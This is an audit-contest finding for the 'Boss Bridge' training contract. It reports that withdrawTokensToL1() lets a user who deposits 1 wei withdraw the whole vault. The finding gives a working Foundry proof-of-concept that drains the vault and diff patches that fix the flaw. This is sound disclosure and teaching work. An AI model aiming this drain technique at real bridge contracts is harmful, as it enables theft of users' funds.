First Flight #4: Boss Bridge

First Flight #4

Beginner FriendlyFoundryBridge

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

By sending any `amount`, attacker can withdraw more funds than deposited

t0x1c

Summary

The withdrawTokensToL1() function has no validation on the withdrawal amount being the same as the deposited amount here. As such any user can drain the entire vault. Note that even the docs state that the operator before signing a message, only checks that the user had made a successful deposit; nothing about the deposit amount:

The bridge operator is in charge of signing withdrawal requests submitted by users. These will be submitted on the L2 component of the bridge, not included here. Our service will validate the payloads submitted by users, checking that the account submitting the withdrawal has first originated a successful deposit in the L1 part of the bridge.

Steps:

Attacker deposits 1 wei (or 0 wei) into the L2 bridge.
Attacker crafts and encodes a malicious message and submits it to the operator to be signed by him. The malicious message has amount field set to a high value, like the total funds available in the vault.
Since the attacker had deposited 1 wei, operator approves & signs the message, not knowing the contents of it since it is encoded.
Attacker calls withdrawTokensToL1().
All vault's funds are transferred to the attacker.

Vulnerability Details

The following PoC shows the above attack vector by draining all the funds from the vault.

Paste the following test inside test/L1TokenBridge.t.sol
Run with forge test --mt test_t0x1cSimpleVaultCleaner -vv

function test_t0x1cSimpleVaultCleaner() public {

// Assume `vault` has some funds in it via deposits from other

// users. We'll steal all funds in the attack.

uint256 vaultInitialBalance = token.balanceOf(address(vault));

deal(address(token), address(vault), 100 ether);

assertEq(token.balanceOf(address(vault)), vaultInitialBalance + 100 ether);

//==================================//

//======= NORMAL USER FLOW =========//

//==================================//

vm.startPrank(user);

uint256 depositAmount = 1 wei;

uint256 userInitialBalance = token.balanceOf(address(user));

token.approve(address(tokenBridge), depositAmount);

tokenBridge.depositTokensToL2(user, userInL2, depositAmount);

assertEq(token.balanceOf(address(vault)), vaultInitialBalance + 100 ether + depositAmount);

assertEq(token.balanceOf(address(user)), userInitialBalance - depositAmount);

//==================================//

//============= ATTACK =============//

//==================================//

// @audit-info : craft a `maliciousMessage` which has amount = vault's balance

uint256 vaultBalance = token.balanceOf(address(vault));

bytes memory maliciousMessage = abi.encode(

address(token), // target

0, // value

abi.encodeCall(IERC20.transferFrom, (address(vault), user, vaultBalance)) // data

);

vm.stopPrank();

// `operator` signs the message off-chain since `user` had deposited 1 wei earlier into the L2 bridge

(uint8 v, bytes32 r, bytes32 s) = _signMessage(maliciousMessage, operator.key);

vm.startPrank(user);

// @audit-info : call `withdrawTokensToL1()` with `maliciousMessage`

tokenBridge.withdrawTokensToL1(user, vaultBalance, v, r, s);

vm.stopPrank();

assertEq(token.balanceOf(address(vault)), 0);

assertEq(token.balanceOf(user), userInitialBalance - depositAmount + vaultBalance);

}

Impact

Attacker can steal all the funds from the vault.

Tools Used

Foundry

Recommendations

Add a mapping that keeps track of the amount deposited by an address inside the function depositTokensToL2(), and validate that inside withdrawTokensToL1(). Here's the git diff patch to be applied:

diff --git a/src/L1BossBridge.sol b/src/L1BossBridge.sol

index 3925b86..db1b9a0 100644

--- a/src/L1BossBridge.sol

+++ b/src/L1BossBridge.sol

@@ -32,6 +32,7 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

IERC20 public immutable token;

L1Vault public immutable vault;

mapping(address account => bool isSigner) public signers;

+ mapping(address account => uint256 amount) public deposited;

error L1BossBridge__DepositLimitReached();

error L1BossBridge__Unauthorized();

@@ -71,6 +72,7 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {

revert L1BossBridge__DepositLimitReached();

}

+ deposited[from] += amount;

token.safeTransferFrom(from, address(vault), amount);

// Our off-chain service picks up this event and mints the corresponding tokens on L2

@@ -89,6 +91,7 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

* @param s The s value of the signature

function withdrawTokensToL1(address to, uint256 amount, uint8 v, bytes32 r, bytes32 s) external {

+ require(amount == deposited[msg.sender], "Invalid withdrawal amount");

sendToL1(

Of course, this means that the user needs to always withdraw the entire amount deposited by him. In case partial withdrawals are to be allowed too, then an additional mapping would be required which keeps track of the withdrawn amount so far and validates that the requested amount to withdraw is always less than or equal to depositedAmount - withdrawnAmount. Following is the diff patch to be applied in such a case:

diff --git a/src/L1BossBridge.sol b/src/L1BossBridge.sol

index 3925b86..62ad26c 100644

--- a/src/L1BossBridge.sol

+++ b/src/L1BossBridge.sol

@@ -32,6 +32,8 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

IERC20 public immutable token;

L1Vault public immutable vault;

mapping(address account => bool isSigner) public signers;

+ mapping(address account => uint256 amount) public deposited;

+ mapping(address account => uint256 amount) public withdrawn;

error L1BossBridge__DepositLimitReached();

error L1BossBridge__Unauthorized();

@@ -71,6 +73,7 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

if (token.balanceOf(address(vault)) + amount > DEPOSIT_LIMIT) {

revert L1BossBridge__DepositLimitReached();

}

+ deposited[from] += amount;

token.safeTransferFrom(from, address(vault), amount);

// Our off-chain service picks up this event and mints the corresponding tokens on L2

@@ -89,6 +92,8 @@ contract L1BossBridge is Ownable, Pausable, ReentrancyGuard {

* @param s The s value of the signature

function withdrawTokensToL1(address to, uint256 amount, uint8 v, bytes32 r, bytes32 s) external {

+ require(amount + withdrawn[msg.sender] <= deposited[msg.sender], "Invalid withdrawal amount");

+ withdrawn[msg.sender] += amount;

sendToL1(

Updates

Lead Judging Commences

0xnevi Lead Judge

almost 2 years ago

0xnevi Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

withdrawTokensToL1(): No check for deposits amount

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.